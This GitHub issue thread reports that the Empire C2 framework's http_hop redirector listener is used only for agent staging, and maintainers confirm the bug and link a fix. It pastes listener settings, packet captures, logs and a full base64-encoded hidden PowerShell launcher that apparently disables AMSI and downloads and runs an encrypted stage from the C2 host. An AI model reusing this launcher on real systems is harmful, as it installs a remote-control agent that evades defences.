### ISSUE TITLE
http_hop listener appears to only be used for staging and not further communications

### ISSUE THREAD

**Issue by atkinsj** [EmpireProject/Empire#370]
## Empire Version

2.0 beta, fresh pull
## OS Information (Linux flavor, Python version)

Local: Kali rolling, updated
Remote: Windows Server 2012 R2 Enterprise
Hop host: the same Kali host running Empire C2, nginx1.10.1 + php7.0.11-1
## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

I feel like I must be doing something wrong on this one because this is a big issue.  
1. Generate a new http listener, bound to a high-port. 
2. Generate a new http_hop listener, set the Host to the public IP of the box on Port 80 and the RedirectListener to the high-port http listener generated in step 1
3. Generate a PowerShell launcher for http_hop
4. Execute it on the host
5. The launcher executes and successfully pulls down an Empire agent via the port 80 http_hop listener in nginx
6. All further communications hit the http listener in step 1 directly and bypass the http_hop listener generated in step 2

I initially hit this because I had a http listener (step 1) bound to 127.0.0.1 so agents would stage and then no further communications would be received, naturally because it was trying to then call back to 127.0.0.1.

Am I misconfiguring this? I cannot see much in the way of documentation but I think it's correct.
## Screenshot of error, embedded text output, or Pastebin link to the error

HTTP listener:

```
http Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  Host              True        http://192.168.0.118:9999        Hostname/IP for staging.
  Port              True        9999                             Port for the listener.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  CertPath          False       /root/empire/data/empire.pem     Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  StagingKey        True        ocBvQZ^8,5>46t#zJT1&@w|~aqj_GI)d Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  ServerVersion     True        Microsoft-IIS/7.5                TServer header for the control server.
```

Hop listener: 

```
http_hop Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  RedirectListener  True        http                             Existing listener to redirect the hop traffic to.
  Name              True        http_hop                         Name for the listener.
  RedirectStagingKeyFalse       ocBvQZ^8,5>46t#zJT1&@w|~aqj_GI)d The staging key for the redirect listener, extracted from RedirectListener automatically.
  Host              True        http://192.168.0.118:80          Hostname/IP for staging.
  OutFolder         True        /tmp/http_hop/                   Folder to output redirectors to.
  DefaultProfile    False       /admin/get.php,/news.php,/login/ Default communication profile for the agent, extracted from RedirectListener automatically.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Port              True        80                               Port for the listener.
```

Launcher generation:
`powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBSAGUAZgBdAC4AQQBTAHMARQBNAEIAbABZAC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAGkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUARQAoACQAbgBVAEwATAAsACQAVAByAFUARQApAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBFAHQALgBTAGUAUgB2AEkAQwBlAFAAbwBpAE4AVABNAEEATgBhAEcARQByAF0AOgA6AEUAWABwAGUAQwB0ADEAMAAwAEMATwBuAHQAaQBOAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoAZQBDAFQAIABTAHkAUwBUAGUAbQAuAE4ARQBUAC4AVwBlAEIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAEUAQQBkAEUAcgBzAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAFkAPQBbAFMAWQBzAHQARQBNAC4ATgBlAHQALgBXAGUAQgBSAGUAcQBVAGUAcwBUAF0AOgA6AEQAZQBmAGEAVQBMAFQAVwBlAEIAUABSAG8AeABZADsAJABXAGMALgBQAFIAbwBYAHkALgBDAFIAZQBkAGUAbgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAGUATQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AdABpAEEATABDAEEAQwBoAGUAXQA6ADoARABFAGYAYQB1AGwAdABOAEUAdAB3AE8AcgBLAEMAUgBlAGQARQBuAHQASQBhAEwAcwA7ACQASwA9AFsAUwBZAHMAVABlAG0ALgBUAGUAWABUAC4ARQBOAEMATwBkAEkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBjAEIAdgBRAFoAXgA4ACwANQA+ADQANgB0ACMAegBKAFQAMQAmAEAAdwB8AH4AYQBxAGoAXwBHAEkAKQBkACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBDAC4ASABlAGEARABFAFIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AcAA5AHIAeABaAG8AcQArAHEARgBJAGwASgBQAHEANgBTAFUAegBXAHoARABUAFgAVQBkAGMAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAxADgAOgA4ADAAJwA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAZABhAHQAQQA9ACQAVwBDAC4ARABvAFcATgBsAG8AQQBkAEQAQQB0AGEAKAAkAFMARQByACsAJAB0ACkAOwAkAGkAVgA9ACQARABBAHQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQAZABBAHQAYQBbADQALgAuACQARABBAFQAYQAuAGwARQBuAGcAdABIAF0AOwAtAEoATwBpAG4AWwBDAGgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
`

tcpdump output confirming it stages via 80 and then communicates via 9999:

> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
> 22:09:20.915167 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [SEW], seq 588822543, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
> 22:09:20.915237 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [S.], seq 3712307808, ack 588822544, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
> 22:09:20.915446 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 1, win 256, length 0
> 22:09:20.915514 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [P.], seq 1:209, ack 1, win 256, length 208: HTTP: GET /login/process.php HTTP/1.1
> 22:09:20.915520 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], ack 209, win 237, length 0
> 22:09:21.273264 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [P.], seq 1:4574, ack 209, win 237, length 4573: HTTP: HTTP/1.1 200 OK
> 22:09:21.273418 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 4574, win 256, length 0
> 22:09:21.273424 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [P.], seq 4574:4579, ack 209, win 237, length 5: HTTP
> 22:09:21.337790 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 4579, win 256, length 0
> 22:09:21.824973 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [P.], seq 209:415, ack 4579, win 256, length 206: HTTP: POST /login/process.php HTTP/1.1
> 22:09:21.825002 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], ack 415, win 245, length 0
> 22:09:21.825302 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [P.], seq 415:877, ack 4579, win 256, length 462: HTTP
> 22:09:21.825309 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], ack 877, win 254, length 0
> 22:09:21.856512 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [P.], seq 4579:5017, ack 877, win 254, length 438: HTTP: HTTP/1.1 200 OK
> 22:09:21.915830 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 5017, win 254, length 0
> 22:09:22.036201 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [P.], seq 877:1079, ack 5017, win 254, length 202: HTTP: POST /admin/get.php HTTP/1.1
> 22:09:22.075252 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], ack 1079, win 262, length 0
> 22:09:22.075757 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [P.], seq 1079:1285, ack 5017, win 254, length 206: HTTP
> 22:09:22.075795 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], ack 1285, win 270, length 0
> 22:09:22.086679 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 5017:7937, ack 1285, win 270, length 2920: HTTP: HTTP/1.1 200 OK
> 22:09:22.086756 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 7937:10857, ack 1285, win 270, length 2920: HTTP
> 22:09:22.086785 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 10857:13777, ack 1285, win 270, length 2920: HTTP
> 22:09:22.086811 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 13777:16697, ack 1285, win 270, length 2920: HTTP
> 22:09:22.086836 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 16697:19617, ack 1285, win 270, length 2920: HTTP
> 22:09:22.087331 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 10857, win 256, length 0
> 22:09:22.087338 IP 192.168.0.118.80 > 192.168.0.126.55482: Flags [.], seq 19617:22537, ack 1285, win 270, length 2920: HTTP
> 22:09:22.087761 IP 192.168.0.126.55482 > 192.168.0.118.80: Flags [.], ack 40090, win 256, length 0
> 22:09:27.286027 IP 192.168.0.126.55483 > 192.168.0.118.9999: Flags [SEW], seq 265796935, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
> 22:09:27.286054 IP 192.168.0.118.9999 > 192.168.0.126.55483: Flags [S.], seq 430680896, ack 265796936, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
> 22:09:27.286352 IP 192.168.0.126.55483 > 192.168.0.118.9999: Flags [.], ack 1, win 256, length 0
> 22:09:27.286781 IP 192.168.0.126.55483 > 192.168.0.118.9999: Flags [P.], seq 1:210, ack 1, win 256, length 209
> 22:09:27.286791 IP 192.168.0.118.9999 > 192.168.0.126.55483: Flags [.], ack 210, win 237, length 0
> 22:09:27.304251 IP 192.168.0.118.9999 > 192.168.0.126.55483: Flags [P.], seq 1:18, ack 210, win 237, length 17
> 22:09:27.304537 IP 192.168.0.118.9999 > 192.168.0.126.55483: Flags [FP.], seq 18:318, ack 210, win 237, length 300
> 22:09:27.305212 IP 192.168.0.126.55483 > 192.168.0.118.9999: Flags [.], ack 319, win 255, length 0
> 22:09:27.305230 IP 192.168.0.126.55483 > 192.168.0.118.9999: Flags [F.], seq 210, ack 319, win 255, length 0
> 22:09:27.305240 IP 192.168.0.118.9999 > 192.168.0.126.55483: Flags [.], ack 211, win 237, length 0
> 22:09:32.345768 IP 192.168.0.126.55484 > 192.168.0.118.9999: Flags [SEW], seq 3308790206, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

Empire debug output:

> 2016-10-09 22:09:20 listeners/http : [_] GET request for 192.168.0.118:9999/login/process.php from 192.168.0.118
> 2016-10-09 22:09:20 Agents : [_] handle_agent_data(): sessionID 00000000 issued a STAGE0 request
> 2016-10-09 22:09:20 listeners/http : [_] Sending POWERSHELL stager (stage 1) to 192.168.0.118
> 2016-10-09 22:09:21 Agents : [_] handle_agent_data(): sessionID N7H8G32L issued a STAGE1 request
> 2016-10-09 22:09:21 Agents : [_] Agent N7H8G32L from 192.168.0.118 posted public key
> 2016-10-09 22:09:21 Agents : [_] Agent N7H8G32L from 192.168.0.118 posted valid PowerShell RSA key
> 2016-10-09 22:09:22 Agents : [_] handle_agent_data(): sessionID N7H8G32L issued a STAGE2 request
> 2016-10-09 22:09:22 Agents : [!] Nonce verified: agent N7H8G32L posted valid sysinfo checkin format: 4342541420831835|http://192.168.0.118:80|TESTNET|Administrator|CONTROLLER|10.0.0.2|Microsoft Windows Server 2012 R2 Standard|True|powershell|4876|powershell|4
> 2016-10-09 22:09:22 Agents : [+] Initial agent N7H8G32L from 192.168.0.118 now active
> 2016-10-09 22:09:22 listeners/http : [_] Sending agent (stage 2) to N7H8G32L at 192.168.0.118
> 2016-10-09 22:09:27 listeners/http : [_] GET request for 192.168.0.118:9999/admin/get.php from 192.168.0.126
> 2016-10-09 22:09:27 Agents : [_] handle_agent_data(): sessionID N7H8G32L issued a TASKING_REQUEST
> 2016-10-09 22:09:32 listeners/http : [_] GET request for 192.168.0.118:9999/admin/get.php from 192.168.0.126
> 2016-10-09 22:09:32 Agents : [_] handle_agent_data(): sessionID N7H8G32L issued a TASKING_REQUEST

nginx access log output

> 192.168.0.126 - - [09/Oct/2016:22:09:21 +1100] "GET /login/process.php HTTP/1.1" 200 4408 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
> 192.168.0.126 - - [09/Oct/2016:22:09:21 +1100] "POST /login/process.php HTTP/1.1" 200 268 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
> 192.168.0.126 - - [09/Oct/2016:22:09:22 +1100] "POST /admin/get.php HTTP/1.1" 200 34903 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

**Comment by rvrsh3ll** [comment]
When you generated the launcher you made sure to point it to the http_hop listener correct?

**Comment by rvrsh3ll** [comment]
I confirmed this as an issue. We'll work on it! Thanks for the info.

**Comment by xorrior** [comment]
https://github.com/EmpireProject/Empire/pull/404
